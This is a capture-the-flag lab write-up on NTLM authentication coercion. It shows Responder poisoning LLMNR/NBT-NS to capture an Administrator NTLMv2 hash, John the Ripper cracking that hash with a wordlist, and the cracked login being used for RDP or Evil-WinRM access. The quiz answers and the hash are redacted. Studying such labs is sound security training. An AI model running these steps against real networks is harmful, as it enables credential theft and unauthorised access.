Day 23

Coerced Authentication Relay All the Way

Learning Objectives

• The basics of network file shares

• Understanding NTLM authentication

• How NTLM authentication coercion attacks work

• How Responder works for authentication coercion attacks

• Forcing authentication coercion using lnk files

This room is again a very straightforward one with all commands and instructions already given. We just need to follow along and run them.

What is the name of the AD authentication protocol that makes use of tickets?
[REDACTED]

What is the name of the AD authentication protocol that makes use of the NTLM hash?
[REDACTED]

What is the name of the tool that can intercept these authentication challenges?
[REDACTED]

What is the password that McGreedy set for the Administrator account?
[REDACTED]

This can be found once the hash is obtained and with the help of hydra we can get the password.

┌──(kali㉿kali)-[~]
└─$ sudo responder -I tun0   
[sudo] password for kali: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.3.0

  To support this project:
  Patreon -> https://www.patreon.com/PythonResponder
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    .
    .
    .
[+] Current Session Variables:
    Responder Machine Name     [WIN-55XORMSS5HF]
    Responder Domain Name      [3ES2.LOCAL]
    Responder DCE-RPC Port     [46997]

[+] Listening for events...                                                                                                                                 

[SMB] NTLMv2-SSP Client   : 10.10.71.80
[SMB] NTLMv2-SSP Username : ELFHQSERVER\Administrator                                                                                                                                                                                       
[SMB] NTLMv2-SSP Hash     : [REDACTED]                                                                                                                                                                                                             
[*] Skipping previously captured hash for ELFHQSERVER\Administrator                                                                                                                                                                         
[*] Skipping previously captured hash for ELFHQSERVER\Administrator    

┌──(kali㉿kali)-[~/Desktop/git/ntlm_theft/stealthy]
└─$ john --wordlist=greedykeys.txt hash.txt
Warning: detected hash type "netntlmv2", but the string is also recognized as "ntlmv2-opencl"
Use the "--format=ntlmv2-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDACTED]

What is the value of the flag that is placed on the Administrator’s desktop?
[REDACTED]

We can either RDP into the machine with ther username and password that we found or use Evil-WinRM. The flag can be found on the desktop.